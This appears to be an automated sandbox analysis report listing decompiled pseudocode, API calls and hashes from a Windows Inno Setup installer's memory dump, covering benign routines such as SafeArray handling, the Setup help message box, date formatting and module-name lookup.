                                                            • API String ID: 1883125708-3870080525
                                                            • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                            • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                            • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                            • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042931C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                            0x0042931c
                                                            0x00429328
                                                            0x0042932e
                                                            0x00429334
                                                            0x00429344
                                                            0x0042934b
                                                            0x0042934b
                                                            0x00429356
                                                            0x00429364
                                                            0x004294ef
                                                            0x004294f6
                                                            0x004294f7
                                                            0x00000000
                                                            0x0042936a
                                                            0x0042936d
                                                            0x0042938b
                                                            0x0042936f
                                                            0x0042937a
                                                            0x0042937a
                                                            0x0042939a
                                                            0x004293a6
                                                            0x004293a9
                                                            0x00429416
                                                            0x0042941c
                                                            0x0042941d
                                                            0x00429423
                                                            0x00429424
                                                            0x00429426
                                                            0x0042942b
                                                            0x0042942f
                                                            0x00429431
                                                            0x00429431
                                                            0x0042943c
                                                            0x00429447
                                                            0x00429452
                                                            0x0042945b
                                                            0x0042945e
                                                            0x0042947a
                                                            0x00429481
                                                            0x0042948c
                                                            0x004294a3
                                                            0x004294a8
                                                            0x004294bc
                                                            0x004294c1
                                                            0x004294d4
                                                            0x004294d4
                                                            0x004294dd
                                                            0x00429460
                                                            0x00429460
                                                            0x00429461
                                                            0x00429467
                                                            0x0042946d
                                                            0x0042946f
                                                            0x00429471
                                                            0x00429474
                                                            0x00429477
                                                            0x00429477
                                                            0x0042947a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0042947a
                                                            0x004293ab
                                                            0x004293ab
                                                            0x004293ac
                                                            0x004293ae
                                                            0x004293b4
                                                            0x004293b6
                                                            0x004293c5
                                                            0x004293c6
                                                            0x004293d0
                                                            0x004293d1
                                                            0x004293d6
                                                            0x004293e1
                                                            0x004293e2
                                                            0x004293ec
                                                            0x004293ed
                                                            0x004293f2
                                                            0x0042940d
                                                            0x0042940f
                                                            0x00429410
                                                            0x00429413
                                                            0x00429413
                                                            0x00000000
                                                            0x004293b4
                                                            0x004293a9

                                                            APIs
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                            • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                            • String ID:
                                                            • API String ID: 351091851-0
                                                            • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                            • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                            • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                            • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AFA44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 34%
                                                            			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}










                                                            0x004afa44
                                                            0x004afa44
                                                            0x004afa47
                                                            0x004afa49
                                                            0x004afa4c
                                                            0x004afa50
                                                            0x004afa51
                                                            0x004afa56
                                                            0x004afa59
                                                            0x004afa63
                                                            0x004afa77
                                                            0x004afa65
                                                            0x004afa6d
                                                            0x004afa6d
                                                            0x004afa7c
                                                            0x004afa81
                                                            0x004afa84
                                                            0x004afa85
                                                            0x004afa8a
                                                            0x004afa97
                                                            0x004afaae
                                                            0x004afab5
                                                            0x004afab8
                                                            0x004afabb
                                                            0x004afacd

                                                            APIs
                                                            • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                            Strings
                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                            • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                            • Setup, xrefs: 004AFA9E
                                                            • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                            • API String ID: 2030045667-3391638011
                                                            • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                            • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                            • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                            • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042F9B8, Relevance: 7.8, APIs: 5, Instructions: 335COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 69%
                                                            			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}
























                                                            0x0042f9b8
                                                            0x0042f9b8
                                                            0x0042f9b9
                                                            0x0042f9bb
                                                            0x0042f9bf
                                                            0x0042f9c2
                                                            0x0042f9c5
                                                            0x0042f9c8
                                                            0x0042f9cf
                                                            0x0042f9dc
                                                            0x0042fb6d
                                                            0x0042fb73
                                                            0x0042fb8a
                                                            0x0042fbac
                                                            0x0042fbbb
                                                            0x0042fbc7
                                                            0x0042fbce
                                                            0x0042fc88
                                                            0x0042fc95
                                                            0x0042fd0a
                                                            0x0042fd19
                                                            0x0042fd25
                                                            0x0042fd2c
                                                            0x0042fde0
                                                            0x00000000
                                                            0x0042fd32
                                                            0x0042fd3c
                                                            0x0042fdd6
                                                            0x0042fddb
                                                            0x00000000
                                                            0x0042fd3e
                                                            0x0042fd41
                                                            0x0042fd42
                                                            0x0042fd49
                                                            0x0042fd4a
                                                            0x0042fd4f
                                                            0x0042fd52
                                                            0x0042fd55
                                                            0x0042fd5f
                                                            0x0042fd6c
                                                            0x0042fd6e
                                                            0x0042fd6e
                                                            0x0042fd92
                                                            0x0042fd97
                                                            0x0042fd9c
                                                            0x0042fd9f
                                                            0x0042fda2
                                                            0x0042fdaf
                                                            0x0042fdaf
                                                            0x0042fd3c
                                                            0x0042fd0c
                                                            0x0042fd0c
                                                            0x00000000
                                                            0x0042fd0c
                                                            0x0042fc97
                                                            0x0042fc9a
                                                            0x0042fc9b
                                                            0x0042fca2
                                                            0x0042fca3
                                                            0x0042fca8
                                                            0x0042fcab
                                                            0x0042fcb1
                                                            0x0042fcba
                                                            0x0042fcc9
                                                            0x0042fccb
                                                            0x0042fccb
                                                            0x0042fcde
                                                            0x0042fce3
                                                            0x0042fce6
                                                            0x0042fce9
                                                            0x0042fcf6
                                                            0x0042fcf6
                                                            0x0042fbd4
                                                            0x0042fbde
                                                            0x0042fc78
                                                            0x0042fc7d
                                                            0x00000000
                                                            0x0042fbe0
                                                            0x0042fbe3
                                                            0x0042fbe4
                                                            0x0042fbeb
                                                            0x0042fbec
                                                            0x0042fbf1
                                                            0x0042fbf4
                                                            0x0042fbf7
                                                            0x0042fc01
                                                            0x0042fc0e
                                                            0x0042fc10
                                                            0x0042fc10
                                                            0x0042fc34
                                                            0x0042fc39
                                                            0x0042fc3e
                                                            0x0042fc41
                                                            0x0042fc44
                                                            0x0042fc51
                                                            0x0042fc51
                                                            0x0042fbde
                                                            0x0042fbae
                                                            0x0042fbae
                                                            0x00000000
                                                            0x0042fbae
                                                            0x0042fb8c
                                                            0x0042fb98
                                                            0x00000000
                                                            0x0042fb98
                                                            0x0042fb75
                                                            0x0042fb7e
                                                            0x00000000
                                                            0x0042fb7e
                                                            0x0042f9e2
                                                            0x0042f9e5
                                                            0x0042f9fc
                                                            0x0042fa22
                                                            0x0042fa31
                                                            0x0042fa3d
                                                            0x0042fa44
                                                            0x0042fb02
                                                            0x0042fb03
                                                            0x0042fb0a
                                                            0x0042fb0b
                                                            0x0042fb10
                                                            0x0042fb13
                                                            0x0042fb19
                                                            0x0042fb22
                                                            0x0042fb35
                                                            0x0042fb37
                                                            0x0042fb37
                                                            0x0042fb4a
                                                            0x0042fb4f
                                                            0x0042fb52
                                                            0x0042fb55
                                                            0x0042fb62
                                                            0x0042fa4a
                                                            0x0042fa54
                                                            0x0042faf2
                                                            0x0042faf7
                                                            0x00000000
                                                            0x0042fa56
                                                            0x0042fa59
                                                            0x0042fa5a
                                                            0x0042fa61
                                                            0x0042fa62
                                                            0x0042fa67
                                                            0x0042fa6a
                                                            0x0042fa6d
                                                            0x0042fa77
                                                            0x0042fa88
                                                            0x0042fa8a
                                                            0x0042fa8a
                                                            0x0042faae
                                                            0x0042fab3
                                                            0x0042fab8
                                                            0x0042fabb
                                                            0x0042fabe
                                                            0x0042facb
                                                            0x0042facb
                                                            0x0042fa54
                                                            0x0042fa24
                                                            0x0042fa24
                                                            0x00000000
                                                            0x0042fa24
                                                            0x0042f9fe
                                                            0x0042fa0a
                                                            0x00000000
                                                            0x0042fa0a
                                                            0x0042f9e7
                                                            0x0042f9f0
                                                            0x0042fde5
                                                            0x0042fded
                                                            0x0042fded
                                                            0x0042f9e5

                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                            • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                            • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                            • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041C790, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}














                                                            0x0041c79d
                                                            0x0041c7a0
                                                            0x0041c7a2
                                                            0x0041c7a6
                                                            0x0041c7a7
                                                            0x0041c7ac
                                                            0x0041c7af
                                                            0x0041c7b4
                                                            0x0041c7c0
                                                            0x0041c7cb
                                                            0x0041c7d6
                                                            0x0041c7dd
                                                            0x0041c7f6
                                                            0x0041c7df
                                                            0x0041c7e7
                                                            0x0041c7e7
                                                            0x0041c80a
                                                            0x0041c823
                                                            0x0041c832
                                                            0x0041c838
                                                            0x0041c842
                                                            0x0041c846
                                                            0x0041c84b
                                                            0x0041c84b
                                                            0x0041c858
                                                            0x0041c858
                                                            0x0041c838
                                                            0x0041c85f
                                                            0x0041c862
                                                            0x0041c865
                                                            0x0041c872

                                                            APIs
                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DateFormatLocaleThread
                                                            • String ID: $yyyy
                                                            • API String ID: 3303714858-404527807
                                                            • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                            • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                            • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                            • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041EEFC, Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 85%
                                                            			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
